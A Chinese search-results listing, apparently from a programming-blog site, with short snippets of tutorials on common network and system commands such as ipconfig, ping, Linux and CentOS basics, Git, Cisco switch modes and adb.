  • 一、实验目的: 掌握一些常见命令的使用; 二、命令的含义和相关的操作; 三、实验器材: 装有系统的计算机; 四、实验内容: ...config命令是我们经常使用的命令,它可以查看网络连接的情况,比如本机的i
  • Windows 常用网络cmd命令

    千次阅读 2019-06-25 15:40:07
    显示基本使用信息,输入:ipconfig /?  ipconfig(常用):当不带任何参数选项,那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值. 二、ping ping是Windows、Unix和...
  • 本机网络查看命令

    千次阅读 2019-03-11 21:45:12
    可以看到显示电脑通信网络信息,最后的IPv4显示本机电脑的IP地址,子网掩码显示网络信息,如果两个电脑的子网掩码是相同的,就说明当前这两台电脑处于同一个网络下(比如同一个路由器)【我的前一篇...
  • 实验名称:常用网络命令 实验地点: 所使用的工具软件及环境: windows7 一、实验目的 熟悉常用网络命令。 二、实验内容 Ping.exe,...
  • -Linux基础入门和架构了解,从Linux起源,Linux架构和Linux形成历史开始逐步讲解,让你彻彻底底了解Linux的诞生,之后介绍了Linux相关文化和核心组成结构,以及Linux常用命令基本用法,课程由浅入深,讲授方法受到...
  • Linux网络连接命令

    千次阅读 2019-03-28 14:04:08
    目录 1. hostname 2. ping 3. ifconfig 4. iwconfig 5. nslookup 6. traceroute 7. finger ...网络和监控命令类似于这些: hostname, ping, ifconfig, iwconfig, netstat, nslookup, trac...
  • Linux系统常用的基本命令

    万次阅读 多人点赞 2018-08-15 15:11:08
    本文主要介绍Linux中常用的基本命令,简单实用,以供大家参考,如有错误,欢迎大家指出。下面开始介绍。 一、查看哪个用户登录的系统 1、users命令 2、whoami命令或者who am i命令 二、查看哪些用户在系统上...
  • 本课程全面介绍了从linux基础内容,一步步,手把手掌握linux基本用法和常见管理方式。让你从课堂即实战,全面了解vim使用、find和特殊权限,学习完可轻松驾驭。
  • Git 常用基本命令使用详细大全

    千次阅读 2019-08-01 17:44:20
    下面从git仓库的创建、git常用的基本命令、git的分支管理、git提交历史查看来介绍git的使用。当然下面所涉及的命令都是在git bash中操作的,所有必须先安装git,至于怎样安装git,这里就不介绍了,网络有一大把安装...
  • 《CISCO交换机常用命令》 一、交换机四种基本模式 1、四种模式介绍 2.进入四种模式 (1)从用户模式进入特权模式:enable (2)从特权模式进入全局配置模式:conf t (3)从全局端口配置模式进入视图模式...
  • 玩转Linux:常用命令实例指南

    万人学习 2019-09-28 11:40:56
    人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。 本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合...
  • Linux系统常用基本命令总结

    万次阅读 多人点赞 2018-11-13 22:42:20
    Linux基本命令 Linux的简介 Linux的厂商 Linux的目录结构 基于虚拟机的环境搭建 常用命令与示例 一、文件基本操作命令 1. ls命令 2. pwd命令 3. mkdir命令 4. cd命令 5. touch命令 6. cp命令 7. mv命令...
  • 在ubuntu系统下使用源码安装了mininet,以下是一些基本命令以及操作: 1.mininet命令图谱: 2. 四种基本拓扑类型的创建:
  • CentOS 7常用基本命令整理

    万次阅读 多人点赞 2018-10-20 12:04:22
    重启命令 立刻重启(root用户使用) reboot shutdown -r now init 6 10分钟后自动重启(root用户使用) shutdown -r 10 在时间为20:35时候重启(root用户使用) shutdown -r 20:35 如果是通过shutdown命令...
  • adb命令大全

    千次阅读 多人点赞 2019-06-03 22:19:07
    三、ADB命令语法单一设备/模拟器连接多个设备/模拟器连接四、ADB常用命令4.1 基本命令4.1.1 查看adb的版本信息4.1.2 启动adb4.1.3 停止adb4.1.4 以 root 权限运行 adbd4.1.5 指定 adb server 的网络端口4.1.5 查询已...
  • 计算机网络 常用网络命令操作实验报告

    万次阅读 多人点赞 2018-06-23 22:14:01
    学会使用Ping、IPConfig、TraceRt、Netstat、ARP等常用网络命令。2.学会配置网络接口IP属性(IP地址、子网掩码、默认网关)。 二、实验环境: 装有cisco packet tracer student的电脑。 三、实验内容:(写出主要...
  • DOS网络命令全集

    千次阅读 2019-07-14 10:21:30
    DOS网络命令全集 在这里整理了有关DOS网络命令 Ping Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,你就可以推断TCP/IP参数是否设置得正确以及...
  • 路由器的基本配置命令

    万次阅读 2017-05-21 12:33:56
    》路由器的配置方式  #使用控制端口console配置;... 在网络上的任意一台计算机,只要权限许可,都可以远程登陆到路由器上,作为路由器的一个模拟中断,对它进行配置。  使用telnet的必备条件:  

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 505,552
精华内容 202,220
关键字:

网络的基本命令